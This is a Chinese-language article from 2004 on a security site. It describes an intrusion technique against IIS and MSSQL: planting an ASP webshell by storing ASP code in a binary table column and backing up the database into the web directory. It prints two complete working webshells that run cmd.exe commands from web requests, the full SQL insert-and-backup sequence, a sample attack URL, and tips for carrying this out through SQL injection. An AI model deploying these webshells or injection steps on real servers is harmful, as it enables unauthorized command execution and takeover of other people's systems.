首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
Backup a shell
来源:www.safechina.net 作者:Swan 发布时间:2004-05-19  

Backup a shell[中安网推荐]


Author:
Swan@SEU
History:
2003/7A simple <%=date%> test under Query Analyzer
2003/8Successfully got a shell
2003/9Tell pi******, en****** and 3 other friends
2003/10Nothing happend but this article was written
2003/12Give this rubbish to w**
2003/12I got a tool? I don't know where it is from...
2004/1ZzZzZzZzZzZzZzZz...
2004/5Last Modification

上面的是垃圾文字,写来提醒自己的,如果有幸被人转贴,连着这一段话,都咔嚓掉吧。

●写在前面:

本来这也不是什么大不了的东西,但是我写了还没有贴出来的时候,有一天QQ上居然有人神神秘秘地把这篇文章传给了我,隔了不久又有人送了我一个这方面的工具!我好感动哦,5555555~
我也不追问他们是哪里得来的了,我给过的就几个,总是这样子传出去的吧。反正大家都知道,也没有什么好保留的,于是在黑防四期上骗了点钱,过程就是这样。
过了五一节我拿出原来写的又改了一下,webshell改得更短,加了些在括号中的注释,不过,最重要的还是加了下面一句:

+----------------------------------------+
│谨以此文献给我最最最最最喜欢的宝贝星星。│
+----------------------------------------+

●正文:


最早想到利用数据库系统来写文件大约是在看到MySQL相关文章的时候,我记得有篇经典的贴子是讲利用TCP反弹结合输入法漏洞入侵的,第一步,也是很重要的一步就是利用了MySQL导出表到文件获得了一个web上的shell。回过头来我想,ACCESS功能不那么强大,有注入漏洞的时候也不能直接获得执行任何命令的权限,就不去看了(事实上还是可以……);MSSQL倒是有很多人详细研究过,执行命令的方法罗列了很多,可是没有了exec的权限,所做的还是有限。很多人就在问,MSSQL下面能不能导出一张表到文件,就像MySQL那样子,至少先获得一个低权限的shell来看看,我找来找去也没有找到导出表的命令,只好退而求其次——不能导出表,那就只好导出数据库了。

在说明做法前,还是先来看看为什么可以。IIS在通过asp.dll处理. asp扩展名文件的时候,对<%%>以外的内容,不做任何处理就直接输出,比如拷贝一个.exe文件到web发布目录,改扩展名为.asp后在IE中请求,返回来的结果是多半是.exe文件的内容,而不会是一个500服务器内部错误。而对于<%%>括起来的内容,默认情况下是按照VBScripts的方式解释执行后给出结果,如果在<%%>里面的内容有语法错误,才会出现常见的500服务器内部错误。换句话说,如果有一个以.asp为扩展名的文件,只要能精心控制所有的<%%>中的内容,我们就能够让它正确的执行,而至于<%%>以外的东西,asp.dll不去处理它,我们也不去关心。(这个有点像我朋友在做的预处理, <%%>外的就像是注释,里面的东西才被解释执行然后返回结果)

再来看看在MSSQL下使用backup database的情况。随便导出一个数据库看看,比如model,当然了,可以在查询分析器中做:

backup database model to disk='c:\a.txt'

用文本的方式打开这个文件,查找是否存在<%和%>,呵呵,显然是没有的吧。通过上面的分析,我们知道,如果把这个文件改扩展名为.asp 后,请求时不会出现问题,也就是说我们的请求会返回文本方式的内容。默认的导出文件不会导致解释执行时的错误,这是很关键的一步。下面我们要让他变为一个 shell,方法自然是做一个表进去,表的内容在备份的时候一定会被存储到备份文件中去的,我们可以控制表的内容,自然也可以控制备份文件的内容。

到这里可能有人已经想一股脑儿把经典的asp shell的内容写入新建的表然后backup database了,嗯,还没有那么简单,你这样做了的话,如果还想继续我们的实验,那可能要花上重装MSSQL的代价。对于文本类型等的数据,比如 text,nvchar等,在数据库中可能的形式是“abc”,但是在导出文件中,已经变成了宽字符的形式,成了“a b c ”,这样子的话,即使你好心写的是一个“<%”,到了备份文件中,一样的成了“< % ”,里面的内容更是乱七八糟,根本不会被解释执行了(你自己不妨做个试验,我只重装了两次而已)。为了避免这种情况,我们创建的表列项应该是一个二进制形式的,比如属性为image,这样子,在里面添加的内容,原来是什么导出的备份文件中也就是什么,规规矩矩的,一点都不会变了。

到了这里,最后只剩下一个问题了,就算你把asp shell的内容写入新建的二进制表,总不会是单独的一行吧(也就是一条记录),谁知道同一个表的两行之间,在导出的备份文件中会不会还有其它的一些内容呢,如果是这样的话,前面一行<%后的内容倒是可以,中间如果有些乱七八遭的数据,用VBScripts的方式解释执行百分之一百是一个500错误。所以每一行必须是一个完整的<%%>,这样子,我们才能完全的控制<%%>内的内容,保证能够得到一个正确无误的asp shell。

OK,终于到了实践的部分了。通过上面的分析,应该知道利用backup database来做一个shell是完全可行的,我们先来改写一下那个利用FSO的asp shell,使其能够符合我们的要求:

<% Dim oScript %>
<% Dim oScriptNet%>
<% Dim oFileSys, oFile%>
<% Dim szCMD, szTempFile%>
<% Set oScript = Server.CreateObject("WSCRIPT.SHELL")%>
<% Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")%>
<% Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")%>
<% szCMD = Request.Form(".CMD")%>
<% If (szCMD <> "") Then%>
<% szTempFile = "C:\" & oFileSys.GetTempName()%>
<% Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)%>
<% Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)%>
<% End If %>
<HTML><BODY><FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run"></FORM><PRE>
<% If (IsObject(oFile)) Then%>
<% On Error Resume Next%>
<% Response.Write Server.HTMLEncode(oFile.ReadAll)%>
<% oFile.Close%>
<% Call oFileSys.DeleteFile(szTempFile, True)%>
<% End If%>
</BODY></HTML>

然后打开查询分析器,依次输入以下的SQL查询语句。这些语句的大意就是创建一张表,里面有一个二进制image类型的列,然后把我们上面改写的那个shell作为内容输进去,最后导出整个数据库到一个.asp文件,开始!

use model
create table cmd (str image);
insert into cmd(str) values ('<% Dim oScript %>');
insert into cmd(str) values ('<% Dim oScriptNet%>');
insert into cmd(str) values ('<% Dim oFileSys, oFile%>');
insert into cmd(str) values ('<% Dim szCMD, szTempFile%>');
insert into cmd(str) values ('<% Set oScript = Server.CreateObject("WSCRIPT.SHELL")%>');
insert into cmd(str) values ('<% Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")%>');
insert into cmd(str) values ('<% Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")%>');
insert into cmd(str) values ('<% szCMD = Request.Form(".CMD")%>');
insert into cmd(str) values ('<% If (szCMD <> "") Then%>');
insert into cmd(str) values ('<% szTempFile = "C:\" & oFileSys.GetTempName()%>');
insert into cmd(str) values ('<% Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)%>');
insert into cmd(str) values ('<% Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)%>');
insert into cmd(str) values ('<% End If %>');
insert into cmd(str) values ('<HTML><BODY><FORM action="<%= Request.ServerVariables("URL") %>" method="POST">');
insert into cmd(str) values ('<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run"></FORM><PRE>');
insert into cmd(str) values ('<% If (IsObject(oFile)) Then%>');
insert into cmd(str) values ('<% On Error Resume Next%>');
insert into cmd(str) values ('<% Response.Write Server.HTMLEncode(oFile.ReadAll)%>');
insert into cmd(str) values ('<% oFile.Close%>');
insert into cmd(str) values ('<% Call oFileSys.DeleteFile(szTempFile, True)%>');
insert into cmd(str) values ('<% End If%>');
insert into cmd(str) values ('</BODY></HTML>');
backup database model to disk='c:\l.asp';

拷贝c:\l.asp到你的web发布目录,再用浏览器请求一下,没有500错误的话,你已经获得一个shell了,不过这个shell中垃圾数据实在是太多,你要多按几下TAB键才能到输入命令的那个输入框。

实践中用FSO的webshell是很不方便的,另外一个可能的webshell是这样子:

<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>

为了造型上的美观,可以做一下适当的修改,不过从形式上来说,这东西应该是最短的。注入时候相应的做一点改动:

use model
create table cmd (str image);
insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');
backup database model to disk='g:\wwwtest\l.asp';

请求的时候,像这样子用:

http://202.119.9.42/l.asp?c=dir

是不是方便一些?

末了再说说可能出现的问题,一般来说随意选择一个数据库导出,默认情况下里面是不含有<%或者%>的,但也不排除有这种可能,尽管几率很小,但是我就遇到过一次。如果以前没有动过model,导出的文件肯定是符合要求的,但是如果你中途如果写错了些东西,比如创建了一个表,内容有<%但是在同一行内没有%>出现的话,这个数据库就再也不能用了,因为也许是为了事务回滚或者是效率上的需要,即使你删除了这张表,在导出的文件中依然保存有这张表的原始内容,所以,千万要一次成功,错了要换一个database。

当然上面只是在查询分析器中的实验,实际情况下,如果你能以sa的身份注入,当然是比较轻松的,只是猜测web的物理路径的时候可能会稍微有一些麻烦,因为你得一次性导出到web的发布目录,不过也许你可以结合其他暴露物理路径的漏洞来利用。如果不是sa的身份的话,也许declare @a sysname;select @a=db_name()会有一些用处。成功的几率,不敢说的太高,估计80%还是有的吧,如果你真的通过这种方法得到了shell,其实你会发现,这真是世界上最可爱最好用的asp shell——尽管有很多垃圾数据,也许还是个2、3M的大家伙。


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·桂林老兵的SQLSERVER高级注入技
·入侵灰色轨迹论坛
·克隆/删除任意用户(RingZ_CDUse
·免FSO的CMD.ASP带回显
·通过乔客(Joekoe)看过滤空格的突
·Chinaren脚本注入式攻击(1)
·or1=1等漏洞问题
·动网论坛上传文件漏洞的原理以及
·SQL注入的不常见方法
·文件上传漏洞在惠信中的应用
·如何把ASP编写成DLL
·巧用asp木马和KV2004得到管理员
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved